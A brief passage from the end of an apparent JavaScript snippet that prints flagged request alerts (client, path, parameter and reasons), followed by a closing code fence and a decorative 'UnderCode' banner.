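    console.log(`${alert.client} ${alert.path} ${hit.param}: ${hit.reasons.join(', ')}`)
  }
}
```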
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁